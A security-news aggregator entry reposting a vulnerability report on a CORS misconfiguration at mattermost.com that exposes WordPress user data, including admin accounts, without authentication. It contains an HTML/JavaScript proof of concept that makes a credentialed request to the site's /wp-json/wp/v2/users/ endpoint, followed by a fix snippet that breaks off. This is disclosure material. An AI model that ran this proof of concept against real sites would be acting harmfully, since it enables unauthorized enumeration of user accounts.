๐ Mattermost: [mattermost.com] CORS Misconfiguration leakage of admin users
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
Sumarry : CORS policies on pages containing sensitive information should be reviewed to determine whether it is appropriate for the application to trust both the intentions and security posture of any domains granted access. It's possible to get information about the users registered (such as: id, name, login name, etc.) without authentication in Wordpress via API on The vulnerability is registered as #772744 #356047 #591302 #138244 #329791 Platform(s) Affected: [website] https://mattermost.com/wp-json/wp/v2/users/ Proof On Concept: javascript <html> <body> <h2>CORS PoC</h2> <div id="demo"> <button type="button" onclick="cors()">Exploit</button> </div> <script> function cors() { var xhr = new XMLHttpRequest(); xhr.onreadystatechange = function() { if (this.readyState == 4 && this.status == 200) { document.getElementById("demo").innerHTML = alert(this.responseText); } }; xhr.open("GET", "https://mattermost.com/wp-json/wp/v2/users/", true); xhr.withCredentials = true; xhr.send(); } </script> </body> </html> * Save as .html and Open and click Exploit on browsers Fix Use this code will hide the users list and give 404 as the result, while rest of the api calls keep running as they were. javascript add_filter( 'rest_endpoints',... ...